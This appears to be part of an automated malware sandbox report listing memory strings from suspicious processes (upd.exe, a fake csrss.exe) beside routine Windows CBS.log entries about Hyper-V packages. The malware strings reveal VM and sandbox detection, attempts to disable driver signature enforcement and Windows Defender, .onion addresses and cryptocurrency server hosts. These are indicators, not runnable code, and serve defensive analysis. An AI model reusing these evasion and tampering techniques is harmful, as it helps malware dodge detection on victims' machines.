Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> ancientany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scrimsonderivedexpiresfallingfeatherfireflyfloat32float64gctraceglitterhttp://id is 0invalidkdu.exelookup max-agemorningnil keynop -> number panic: patientrefererrefreshrunningserial:server=signal silencesvc_versyscallthundertraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwsarecvwsasendwup_verxen: %wxennet6 data=%q etypes goal
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: d3310f7470f5cc3e99866abe683b453d, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.onion/%d-%d/%d-%s/31340370000390625:31461<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaClass(CommonCookieCopticDELETEExpectFltMgrFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWinmon[]byte\??\%s\csrss\ufffd
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: de764c40154bbe38bec34936ef639ab9, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, new state: Off
Source: csrss.exe Binary or memory string: ikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexa
Source: upd.exe, 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, upd.exe, 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: to unallocated span%%!%c(*big.Float=%s)%s\Sysnative\cmd.exe37252902984619140625Arabic Standard TimeAzores Standard TimeCertFindChainInStoreCertOpenSystemStoreWChangeServiceConfigWCheckTokenMembershipCreateProcessAsUserWCryptAcquireContextWDHT has wrong lengthDQT has wrong lengthDRI has wrong lengthEgyptian_HieroglyphsEnumProcessModulesExFileTimeToSystemTimeGetAcceptExSockaddrsGetAdaptersAddressesGetCurrentDirectoryWGetFileAttributesExWGetModuleFileNameExWGetModuleInformationGetProcessMemoryInfoGetWindowsDirectoryWIDS_Trinary_OperatorInsufficient StorageIsrael Standard TimeJordan Standard TimeMAX_HEADER_LIST_SIZEMalformed JSON errorMediapartners-GoogleMeroitic_HieroglyphsNtUnmapViewOfSectionNtWriteVirtualMemoryOffline Explorer/2.5ProcessIdToSessionIdQueryServiceConfig2WQueryServiceStatusExRegisterEventSourceWRequest URI Too LongRtlInitUnicodeStringSHGetKnownFolderPathSOF has wrong lengthSOS has wrong lengthSafeArrayDestroyDataSafeArrayGetElemsizeSeek: invalid offsetSeek: invalid whenceSetCurrentDirectoryWSetHandleInformationSetVolumeMountPointWTaipei Standard TimeTerminal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)close of nil channelconnection error: %sconnection timed outcouldn't disable DSEcouldn't get IsAdmincouldn't get serverscouldn't run servicecouldn't set IsAdmincouldn't set serverscouldn't stop PsaSvccouldn't write patchelectrum.hsmiths.comelectrum.taborsky.czelectrum.villocq.comflag: help requestedfloating point errorforcegc: phase errorgc_trigger underflowgetadaptersaddressesgo of nil func valuegopark: bad g statusgzip: invalid headerheader line too longhttp2: stream closedinvalid repeat countinvalid request codeis a named type filejson: Unmarshal(nil json: Unmarshal(nil)key has been revokedmSpanList.insertBackmalformed ciphertextmalloc during signalmultiple SOF markersno such struct fieldnon-empty swept listnorm: invalid whencenot an integer classnotetsleep not on g0number has no digitsnumber of componentsp mcache not flushedpacer: assist ratio=pad length too largepreempt off reason: reflect.Value.SetIntreflect.makeFuncStubrequest file CDN: %wroot\SecurityCenter2runtime: casgstatus runtime: double waitruntime: unknown pc semaRoot rotateRightshort segment lengthsystemdrive is emptytime: invalid numbertrace: out of memoryunexpected network: unknown address typeuser is not an adminverifier host cachedwirep: already in goworkbuf is not emptywrite of Go pointer ws2_32.dll not foundzlib: invalid header gp.gcscanvalid=true
Source: csrss.exe Binary or memory string: time: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released MB) wo
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6f103d2215911a17c9aeb968bbb7f0f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:55, Info CBS Exec: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wwildflowerws2_32.dll of size (targetpc= ErrCode=%v a.npages= b.npages= bytes ...
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 6c8ed4d2fcb42a918382a31f6ce603ca, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: NonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8adcd7c28d228e17a421ad9e66bf8586, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 38d80af2e352703d5d4e13c0bc9c4856 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1d039a16ef6f80b4a5fd50c2225168a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 88e8c6b6d1631bfe1e6f3e0910f44c84, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b86b0f63de3fd3d9f4c1defbc0a310e2, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V_base, Applicable: NeedsParent, Disposition: Staged
Source: svchost.exe, 0000001F.00000002.434018305.000002A1980EF000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: a20631c4cf6af783bb59c9a72c1b3c51, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe Binary or memory string: T_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe, csrss.exe Binary or memory string: minal_PunctuationTurkey Standard TimeUnprocessable EntityWinmonProcessMonitor[invalid char class]\\.\pipe\VBoxTrayIPCasn1: syntax error: bad defer size classbad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpchan send (nil chan)clo
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: eab40d924d8b5549872893de549370fa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: ... omitting accept-charsetafter EfiGuardallocfreetracebad RST markerbad allocCountbad record MACbad span statebad stack sizebtc.usebsv.comcert installedchecksum errorcontent-lengthcouldn't patchdata truncateddistributor_iddriver removedexit status -1file too largefinalizer waitgcstoptheworldgetprotobynamegot system PIDinitial serverinternal errorinvalid syntaxis a directorykey size wronglevel 2 haltedlevel 3 haltedlookup TXT: %wmemprofilerateneed more datanil elem type!no module datano such deviceparse cert: %wprotocol errorread certs: %wreport_id is 0runtime: base=runtime: full=s.allocCount= semaRoot queueserver.versionstack overflowstopm spinningstore64 failedsync.Cond.Waittext file busytimeEndPeriodtoo many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero parameter with GC prog
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Windows-Foundation-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1a8a1b3524f6b9bff288f49da85c14f6, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: acceptactiveautumnbitterbreezebrokenchan<-cherryclosedcookiedivinedomaindwarf.efenceempty exec: expectfloralflowerforestfrostygopherhangupheaderhiddenip+netkilledlistenlittlelivelymeadowminutenumberobjectpopcntpurplereadatreasonremoverenamerun-v3rune1 sc.binscvg: secondsecureselectsendtoservershadowsilentsocketsocks socks5springstatusstringstructsummersunsetsweep telnetuint16uint32uint64unusedvioletvmhgfsvmxnetvpc-s3winterwup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> dying= flags= len=%d locks= m->g0= nmsys= s=nil
Source: csrss.exe Binary or memory string: rayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-lang
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 02124bd8d86f6990d0675e6c392d9200, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: IP addressIsValidSidKeep-AliveKharoshthiLocalAllocLockFileExLogonUserWManichaeanMessage-IdNo ContentOld_ItalicOld_PermicOld_TurkicOpenEventWOpenMutexWOpenThreadOther_MathPOSTALCODEParseFloatPhoenicianProcessingPulseEventRST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieUser-AgentVMSrvc.exeVT_ILLEGALWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10[:^alnum:][:^alpha:][:^ascii:][:^blank:][:^cntrl:][:^digit:][:^graph:][:^lower:][:^print:][:^punct:][:^space:][:^upper:][:xdigit:]\\.\WinMon\patch.exe^{[\w-]+}$app_%d.txtatomicand8casgstatuscmd is nilcomplex128connectiondnsapi.dlldsefix.exedwarf.Attre.keff.orgexitThreadexp mastergetsockoptgoroutine http_proxyimage/jpegimage/webpinvalidptrkeep-alivemSpanInUseno resultsnot a boolnot signedowner diedprl_cc.exeres binderres masterresumptionrune <nil>runtime: gschedtracesemacquireset-cookiesetsockoptsocks bindterminatedtracefree(tracegc()
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTESTING KEYTTL expiredVBoxServiceVMUSrvc.exeVT_RESERVEDVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exealarm clockapplicationbad addressbad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcompaign_idcreated by crypt32.dlldnsmessage.e2.keff.orgembedded/%sfile existsfinal tokenfloat32nan2float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknamehttps_proxyi/o timeoutlocal errorlost mcachemSpanManualmethodargs(mswsock.dllnext servernil contextorannis.comparse errorprocess: %sraw-controlreflect.Setretry-afterruntime: P runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writetaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion=183wininet.dllwup_process (sensitive) [recovered] allocCount found at *( gcscandone m->gsignal= minTrigger= nDataRoots= nSpanRoots= pages/byte
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 762e99ca5a85803eb16880bf94ac8a17, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Installed, targeted: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7c41348249711e2c2834f1d280a7daaa, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-PowerShell, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 27a952ddb20b8a44c2d225c36c4b0274, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
